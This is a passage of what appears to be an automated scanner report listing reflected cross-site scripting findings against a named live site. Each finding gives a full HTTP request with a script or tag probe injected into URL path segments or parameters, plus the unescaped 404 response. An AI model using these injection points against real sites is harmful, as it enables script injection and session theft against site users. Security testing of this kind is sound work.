X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/3half.giff3482<script>alert(1)</script>e6ac0f31f7f was not found on this server.</p>
...[SNIP]...

2.5419. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/3half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 79d9d<script>alert(1)</script>25313d78532 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/3half.gif?79d9d<script>alert(1)</script>25313d78532=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/3half.gif?79d9d<script>alert(1)</script>25313d78532=1 was not found on this server.</p>
...[SNIP]...

2.5420. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e79f2<script>alert(1)</script>e451470d940 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicee79f2<script>alert(1)</script>e451470d940/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicee79f2<script>alert(1)</script>e451470d940/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5421. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aef59<script>alert(1)</script>c3fcd920354 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themesaef59<script>alert(1)</script>c3fcd920354/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themesaef59<script>alert(1)</script>c3fcd920354/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5422. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ed30a<script>alert(1)</script>43ed4aa269 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmosed30a<script>alert(1)</script>43ed4aa269/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmosed30a<script>alert(1)</script>43ed4aa269/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5423. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dbbd7<script>alert(1)</script>3e5a29473d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/imagesdbbd7<script>alert(1)</script>3e5a29473d/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/imagesdbbd7<script>alert(1)</script>3e5a29473d/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5424. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 990e9<script>alert(1)</script>2c59954aee8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating990e9<script>alert(1)</script>2c59954aee8/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating990e9<script>alert(1)</script>2c59954aee8/4half.gif was not found on this server.</p>
...[SNIP]...

2.5425. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 53dd7<script>alert(1)</script>2a58cfd8b0e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/4half.gif53dd7<script>alert(1)</script>2a58cfd8b0e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/4half.gif53dd7<script>alert(1)</script>2a58cfd8b0e was not found on this server.</p>
...[SNIP]...

2.5426. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7fcef<script>alert(1)</script>3f1bcd76ec9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/4half.gif?7fcef<script>alert(1)</script>3f1bcd76ec9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/4half.gif?7fcef<script>alert(1)</script>3f1bcd76ec9=1 was not found on this server.</p>
...[SNIP]...

2.5427. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fcafd<script>alert(1)</script>6a3a5279fb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicefcafd<script>alert(1)</script>6a3a5279fb0/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicefcafd<script>alert(1)</script>6a3a5279fb0/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5428. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25f96<script>alert(1)</script>86dda80038b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes25f96<script>alert(1)</script>86dda80038b/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes25f96<script>alert(1)</script>86dda80038b/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5429. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d6043<script>alert(1)</script>c6e0955496d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmosd6043<script>alert(1)</script>c6e0955496d/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmosd6043<script>alert(1)</script>c6e0955496d/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5430. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 933cb<script>alert(1)</script>7581780b58c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images933cb<script>alert(1)</script>7581780b58c/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images933cb<script>alert(1)</script>7581780b58c/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5431. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 767a4<script>alert(1)</script>a03371fb785 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating767a4<script>alert(1)</script>a03371fb785/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating767a4<script>alert(1)</script>a03371fb785/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5432. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 58493<script>alert(1)</script>89378b86b78 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/search.php58493<script>alert(1)</script>89378b86b78?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/search.php58493<script>alert(1)</script>89378b86b78?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5433. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 80ef7<a>3b301bc4c1e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search80ef7<a>3b301bc4c1e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search80ef7<a>3b301bc4c1e&opt=2 was not found on this server.</p>
...[SNIP]...

2.5434. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 194fc<a>5c71b61e16f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/images/rating/search.php?keyword=search...194fc<a>5c71b61e16f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/search.php?keyword=search...194fc<a>5c71b61e16f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5435. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 92156<script>alert(1)</script>6268001594d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&92156<script>alert(1)</script>6268001594d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&92156<script>alert(1)</script>6268001594d=1 was not found on this server.</p>
...[SNIP]...

2.5436. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d5b75<a>47188a7998f was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d5b75<a>47188a7998f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d5b75<a>47188a7998f was not found on this server.</p>
...[SNIP]...

